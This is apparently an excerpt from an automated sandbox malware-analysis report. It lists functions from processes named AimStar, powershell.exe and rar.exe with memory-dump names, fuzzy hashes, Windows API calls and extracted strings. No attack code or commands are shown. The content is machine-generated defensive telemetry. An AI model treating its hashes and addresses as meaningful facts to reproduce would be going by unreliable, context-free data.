Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 3c52e08cedf941c1ae9b1750b3696222e2ae38ee0496ff96ed257582475d87fc
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: AB017126A1CA0685F720BF60946727EA3B4EF49728FD40036E54D82791DE2CF548CA24

Function 00007FF8A92D8B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00007FF8A92D83B4), ref: 00007FF8A92D8B36
SystemTimeToFileTime.KERNEL32(?,00007FF8A92D83B4), ref: 00007FF8A92D8B46

Strings

gfff, xrefs: 00007FF8A92D8B7A

Memory Dump Source

Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction ID: f372fa93ea2cbd4783936a7bc623a0a44a6f3c69a564ab6baf0a3210ebdc0873
Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction Fuzzy Hash: 6901DBE2B19A8556EB64DF25F84119567A0FBCC7C4B44D032E65DCBB59EE2CD2018740

Analysis Process: powershell.exePID: 7552, Parent PID: 7400COMMON

Executed Functions

Function 00007FF8476B3027 Relevance: 1.0, Instructions: 1007COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2203249433.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8476b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4dbabb3a899e34f98406c98b6033d51d44eba1a33e538ef7a97adc19271e4e
Instruction ID: 749ee41d4a032aaf6167dea6e9634e28c4191140318d019756891c2e644ea798
Opcode Fuzzy Hash: 9c4dbabb3a899e34f98406c98b6033d51d44eba1a33e538ef7a97adc19271e4e
Instruction Fuzzy Hash: 26525721E0DBD99FEB96A72D58551B97FE2EF67250B0901FBC14CC7193ED18AC0A8342

Function 00007FF8476B67F5 Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2203249433.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8476b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621cc376beaf540c169d57b289c5024c1f27948f2c96a95b62ecb2c6a82354d9
Instruction ID: f1ca48200cdf74829f7d9da18d47210eae6c4ab59a3a38bbb42315cf87f65de4
Opcode Fuzzy Hash: 621cc376beaf540c169d57b289c5024c1f27948f2c96a95b62ecb2c6a82354d9
Instruction Fuzzy Hash: 4FD14231D0EA9A9FEBA5AB6858545B97FE2EF27394B0800FED14DC7093DA18A801C351

Function 00007FF8475EA165 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2201327713.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8475e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a938e228acd6dbcd4f28c0296bbf6a300bf4c33de6aa8b6299bbdb86ff977f86
Instruction ID: 38070d1a9453fe038bab6c77a4220899d996a3a525ba9dd3ae777ecc8e81492e
Opcode Fuzzy Hash: a938e228acd6dbcd4f28c0296bbf6a300bf4c33de6aa8b6299bbdb86ff977f86
Instruction Fuzzy Hash: 46413062C0E3C55FD743AB7858760D87F70DF23265B1A41E7D098CE0E3EA185948C766

Function 00007FF8476B4253 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2203249433.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8476b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fac5dbb096f9fe0c8a139559a8a6af3cdf1d15de64e5e03eabecf819487cf67
Instruction ID: 60bdfe6d01c40d6d4e6c5bcb1141cd6227daabc83bbc6259ec079ec0ff7e6132
Opcode Fuzzy Hash: 0fac5dbb096f9fe0c8a139559a8a6af3cdf1d15de64e5e03eabecf819487cf67
Instruction Fuzzy Hash: 71515F32E0DE568FEB99E62C94512787BD2EFA6390B1801BAC74DC7197DE25EC0583C1

Function 00007FF8475E9880 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2201327713.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8475e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 474f776dbf413815f4cefaf6f31b3d0f76f7c2b80fc0ebf1f36e72c38774646f
Instruction ID: 4a29ca5f8e70120202090c18f8b9fa1cb54d587f43b8dffc095932bd8c7eb607
Opcode Fuzzy Hash: 474f776dbf413815f4cefaf6f31b3d0f76f7c2b80fc0ebf1f36e72c38774646f
Instruction Fuzzy Hash: 5531D57191CB888FDB189B5C9C066B97BF0FB99710F00426FE459D3292CA75A855CBC3

Function 00007FF8474CEFE0 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2199297216.00007FF8474CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8474CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8474cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65829becc7098936143e2b2f05ef3a42cfd69622f761730171901d3a2eb5b011
Instruction ID: c8f02c1cdebea64c927971e32bb462dcec54edbafa0832c6c96658f07c7c5752
Opcode Fuzzy Hash: 65829becc7098936143e2b2f05ef3a42cfd69622f761730171901d3a2eb5b011
Instruction Fuzzy Hash: D141477180DBC49FE7569B399841A623FF0EF42360B1601DFD088CB1A7D629A846C7A2

Function 00007FF8475EB9DC Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2201327713.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8475e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a9c0e2f73a31814792c4cf3849d5eca8d00d23f7527a3440a8ccd2aa85d9c4
Instruction ID: e8c77befe68502e6599b9e170ca4dea6ec6b0365fa993b021e6c54e1e8812648
Opcode Fuzzy Hash: 57a9c0e2f73a31814792c4cf3849d5eca8d00d23f7527a3440a8ccd2aa85d9c4
Instruction Fuzzy Hash: 1931487180CB8C8FEB59DF689C4A6E97FE0EF66321F04416FC088C7153CA685806CB51

Function 00007FF8476B429F Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2203249433.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8476b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ade077a9f2f2232da774fd0526af5d261f591502f3b9d88223f1a36126f7d34
Instruction ID: b1ff2861c63170c9d154cc27e7c94e81837816d556999c439f5fb2ebceda7091
Opcode Fuzzy Hash: 5ade077a9f2f2232da774fd0526af5d261f591502f3b9d88223f1a36126f7d34
Instruction Fuzzy Hash: 17210932E0DA57CFEBA9E62C94511787BD2EF6639075901B9CB4DC3193CE28EC048381

Function 00007FF8475E33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2201327713.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8475e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: b9bf22d125422fe50aac5e9c262cb6e3591dd9766d4fd93a4ee8e67d0f6c4c54
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7001677111CB0C8FD744EF0CE451AA5B7E0FB99364F10056DE58AC36A5DA36E882CB45

Function 00007FF8476B45DA Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2203249433.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8476b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76482f3ad11c7fade7164bbd528e5ce5a5637e8e6b161252fd77ec710de2f1b
Instruction ID: 524045109d47532a7ed7aed441c273e243ed72fb6d62a32c53461fcac33a3457
Opcode Fuzzy Hash: d76482f3ad11c7fade7164bbd528e5ce5a5637e8e6b161252fd77ec710de2f1b
Instruction Fuzzy Hash: 80F05431A0D5558FDF54EB2CE4819A87BE0FF5536071500B6E61DC7157DB25EC44C790

Analysis Process: powershell.exePID: 7444, Parent PID: 8024COMMON

Executed Functions

Function 00007FF8476A17D9 Relevance: .8, Instructions: 770COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2300597861.00007FF8476A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ff8476a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f99abcf2bcc6fbc609e11ff8396d1f747a676b219fcf96f99e0303720c4b073
Instruction ID: 3d556393d3ec6358741a450b4724fa91573abb4f091657ccee0ea5f2c103284d
Opcode Fuzzy Hash: 3f99abcf2bcc6fbc609e11ff8396d1f747a676b219fcf96f99e0303720c4b073
Instruction Fuzzy Hash: 0E220821E0DB898FEB9AA73868556BA7FF2EF47650B0801FBD08DC7193D9189C06C751

Function 00007FF8475D450D Relevance: .8, Instructions: 827COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2299456713.00007FF8475D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ff8475d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8aa7a287e216274991f232bb734b50fd60e928f09d8a80a10a01a4c78d5adc
Instruction ID: b2d282ad353d92da47cfc8fb1543656dc83e0ab7d8e23668627cf9aaf5583620
Opcode Fuzzy Hash: 5f8aa7a287e216274991f232bb734b50fd60e928f09d8a80a10a01a4c78d5adc
Instruction Fuzzy Hash: 00B1D231E0D6868FEB15EB6CD8951EDBFB0EF46350B1541BBC489CB293DA256806CB80

Function 00007FF8476A0AA4 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2300597861.00007FF8476A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ff8476a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5afc4825cf9a0afde016c85360d7c8e6d752f6a41b45a7210652fdc93bf9c4a3
Instruction ID: d76fa03f8749500a1212d3c58a972424bce51fdc8c48926f21a2f6bc38aa5fca
Opcode Fuzzy Hash: 5afc4825cf9a0afde016c85360d7c8e6d752f6a41b45a7210652fdc93bf9c4a3
Instruction Fuzzy Hash: B631F432E0DB5A8FEBA1E66C68056FE77D2EF567A4B1805B7C10DC3093E919AC058391

Function 00007FF8475D3945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2299456713.00007FF8475D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ff8475d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: ec7303ac25b6f2ba240a62a78cda6aba8bd6885d5843fd76fa0bf63e93a1e51e
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: DE01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3695D636E882CB45

Analysis Process: rar.exePID: 7484, Parent PID: 8064COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1203
Total number of Limit Nodes:	37

Executed Functions

Function 00007FF7139654C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON

Download Yara Rule

Strings

VER, xrefs: 00007FF713965EBA
stdin, xrefs: 00007FF71396672D
rar.log, xrefs: 00007FF713965CE5
*.%ls, xrefs: 00007FF7139659AF
ERR, xrefs: 00007FF713965D40
default.sfx, xrefs: 00007FF7139660F4
NUL, xrefs: 00007FF713965DB3
SFX, xrefs: 00007FF7139660CC
OFF, xrefs: 00007FF713965E4B
+, xrefs: 00007FF713966535
7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx, xrefs: 00007FF713965935
LOG, xrefs: 00007FF713965CD0
EML, xrefs: 00007FF713965D6B
SND, xrefs: 00007FF713965D11
*?., xrefs: 00007FF71396598C
stdin, xrefs: 00007FF713966236

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID:
String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
API String ID: 0-1628410872
Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction ID: a9af07292c955b746de2f046eb00180c83a22425f97619f95119b9f24dc9d007
Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction Fuzzy Hash: 76C2B5B2A0E98381FAE4BF2485441BDA691AF417BCFD94135C90E672C5DE6DE94CC3B0

Function 00007FF713951884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON

Download Yara Rule

Strings

BK, xrefs: 00007FF7139519C5
q:, xrefs: 00007FF7139519DA
rar, xrefs: 00007FF7139518AA
exe, xrefs: 00007FF713951897
.ext, xrefs: 00007FF7139518C0
,6, xrefs: 00007FF713952F83
%s%s , xrefs: 00007FF713952A46
sfx, xrefs: 00007FF713951884

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID:
String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
API String ID: 0-1660254149
Opcode ID: 0c0b921d0b311a97555fb44d5d4ee5c10b30d4247630290dee678d4f4fbba25b
Instruction ID: c7dfe826d7f69ef241f4f806cfa7a4e59588eb5d86481f8dde5c8db2a5be38eb
Opcode Fuzzy Hash: 0c0b921d0b311a97555fb44d5d4ee5c10b30d4247630290dee678d4f4fbba25b
Instruction Fuzzy Hash: 67E2BE66A09EC285EBA0EF25D8401EDA7B1FB457ACF850037DA4D27796DF39D588C320

Function 00007FF7139948CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF713994AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF71396CC90), ref: 00007FF713994AF5

GetModuleFileNameW.KERNEL32(?,?,?,00007FF713987E7D), ref: 00007FF71399492E
GetVersionExW.KERNEL32(?,?,?,00007FF713987E7D), ref: 00007FF71399496A
LoadLibraryExW.KERNELBASE(?,?,?,00007FF713987E7D), ref: 00007FF713994993
LoadLibraryW.KERNEL32(?,?,?,00007FF713987E7D), ref: 00007FF71399499F

Strings

rarlng.dll, xrefs: 00007FF71399493A

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID: Library$Load$FileFreeModuleNameVersion
String ID: rarlng.dll
API String ID: 2520153904-1675521814
Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
Instruction ID: 9b2569998decb65ae342702c0b3553daf8e332e242ded51ad6efaab3388051d3
Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
Instruction Fuzzy Hash: 03319431A18E4285FBA4EB25E8402E9A368FB45BACFC04135E94D63794DF3DD94DCB10

Function 00007FF713984398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF7139838CB,?,?,?,00007FF7139841EC), ref: 00007FF7139843D1
RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7139838CB,?,?,?,00007FF7139841EC), ref: 00007FF713984402
RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7139838CB,?,?,?,00007FF7139841EC), ref: 00007FF71398440D
GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF7139838CB,?,?,?,00007FF7139841EC), ref: 00007FF71398443E

Strings

Software\WinRAR\Paths, xrefs: 00007FF7139843BC
AppData, xrefs: 00007FF7139843F7

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID: CloseFileModuleNameOpenQueryValue
String ID: AppData$Software\WinRAR\Paths
API String ID: 3617018055-3415417297
Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction ID: 4feeafe9dde629701b8e34eb0856fe7c1f66a59cba460077fbcf5ca236e181d1
Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction Fuzzy Hash: 0B117562628F4585EB90AF26E4015A9F360FF85BE8F845135EA4E27755DF3CD008CB50

Function 00007FF7139B2488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7139B246C), ref: 00007FF7139B24B0
TerminateProcess.KERNEL32(?,?,?,00007FF7139B246C), ref: 00007FF7139B24BB
ExitProcess.KERNEL32 ref: 00007FF7139B24CA

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction ID: 33e2108091c723e3e168f3bc1b955fed7a4b2792b3ff89472748a1f949063fac
Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction Fuzzy Hash: 08E04F20B18F0542EAC4BB3098817796363AF85769F405478CC4E23397CE3DE80C8770

Function 00007FF71395681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7139568AE
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7139568BF

Memory Dump Source

Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true

Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
